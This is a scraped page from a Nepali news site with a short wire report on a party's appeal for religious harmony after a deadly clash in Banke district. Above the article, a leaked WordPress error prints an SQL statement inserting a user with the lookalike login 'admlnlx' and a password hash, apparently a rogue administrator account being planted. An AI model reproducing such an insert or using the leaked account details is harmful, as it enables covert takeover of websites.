WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B7UVagrPWkW8A5ankV4xCO91DMbl640', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-31 17:01:46', '', 'admlnlx', 'admlnlx')


Warning: Trying to access array offset on value of type bool in /home/gaulekhabar.com/public_html/wp-content/themes/nepali-news-portal/header.php on line 21
जातीय सद्भाव बढाउन राष्ट्रवादी पार्टीको माग – Gaule Khabar

जातीय सद्भाव बढाउन राष्ट्रवादी पार्टीको माग

जातीय सद्भाव बढाउन राष्ट्रवादी पार्टीको माग

काठमाडौँ, मंसिर २९ –

राष्ट्रवादी पार्टीले जातीय तथा धार्मिक सद्भाव कायम राख्न सबैमा अपिल गर्नुभएको छ ।

सो पार्टीका केन्द्रीय संयोजक सहजात मिकरानीले आज यहाँ एक प्रेस विज्ञप्ति प्रकाशित गरी बाँके जिल्लाको क्षेत्र नं। २ स्थित मटेहियामा सोमबार भएको दुई पक्षीय झडपबाट सिर्जित घटनालाई आपसी सद्भाव र भाइचाराबाट साम्य पार्नुपर्ने अपिल गर्नुभएको हो ।

धार्मिक सदभाव बिथोल्ने गरी शान्तिपूर्ण जुलुसमा दुई पक्षबीच भएको झडपमा संलग्न दोषीलाई कडा कानुनी कारबाही गर्न सो पार्टीले माग गरेको विज्ञप्तिमा उल्लेख छ ।
सो घटनामा एक जनाको मृत्यु हुनाका साथै पाँचजना गम्भीर रुपले घाइते भएको विज्ञप्तिमा भनिएको छ । – रासस

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका